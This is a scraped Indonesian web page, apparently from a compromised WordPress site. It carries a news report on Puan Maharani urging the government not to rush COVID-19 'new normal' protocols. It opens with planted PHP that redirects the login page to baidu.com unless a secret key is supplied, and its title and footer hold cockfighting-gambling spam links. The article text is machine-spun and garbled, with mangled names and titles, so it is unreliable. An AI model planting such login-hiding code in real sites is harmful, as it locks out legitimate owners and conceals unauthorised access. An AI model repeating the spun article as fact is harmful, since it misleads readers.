//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Pemerintah meminta tidak terburu-buru menyiapkan kesepakatan teknologi konvensional baru untuk Covid-19 | adu ayam bali_s128.net login_s128.live

Pemerintah meminta tidak terburu-buru menyiapkan kesepakatan teknologi konvensional baru untuk Covid-19

Jakarta-Tribunnews.com reporter Seno Tri Sulistiyono melaporkan-Ketua DPR DKI Jakarta Puan Maharani mengimbau pemerintah tidak terburu-buru bersiap menghadapi normal, berproduksi, dan aman saat virus corona atau pandemi Covid-19. Atau perjanjian langganan baru.

“Jangan sampai kesepakatan teknis diburu-buru, jangan sampai menjadi belum matang, malah menimbulkan kekacauan baru di masyarakat,” kata Puan dalam sambutannya di Jakarta, Rabu (27/5/2020). -Membaca: Banyak orang mabuk setelah hari darurat diumumkan di Jepang-Puan mengatakan bahwa kesepakatan normal baru untuk setiap kegiatan atau lokasi pasti akan berbeda. Kota, pusat perbelanjaan, sekolah, tempat kerja atau tempat umum lainnya.

Pan An mengatakan bahwa Organisasi Kesehatan Dunia atau Organisasi Kesehatan Dunia sendiri telah merumuskan beberapa pertimbangan untuk semua negara sebelum menerapkan kehidupan normal baru bagi mereka. Kemampuan mengontrol penyebaran virus korona, kemudian Pan berkata: “Lebih lanjut Pune mengatakan bahwa penelitian ilmiah harus dilakukan sebelum standar baru diterapkan sebagai patokan untuk penetapan kebijakan.

“ Transparansi data sangat penting karena Pemerintah perlu menjelaskan kepada masyarakat tren pandemi Covid-19 saat ini di Indonesia dan bagaimana memprediksi perkembangannya di masa depan, “kata Puan .-” Bagi masyarakat, sudah jelas mengapa kesepakatan itu dikembangkan. Dia melanjutkan. 23 WN Malaysia divonis denda 3,5 juta rupiah-oleh karena itu, Puan meminta pemerintah benar-benar melengkapi detail harapan dan langkahnya, termasuk tanggung jawab para pihak untuk setiap proses pengadilan. – “Disiplin ketat. Tidak hanya dari pengawasan aparat pemerintah, tapi juga dari disiplin warga.”

Leave a comment

adu ayam bali_s128.net login_s128.live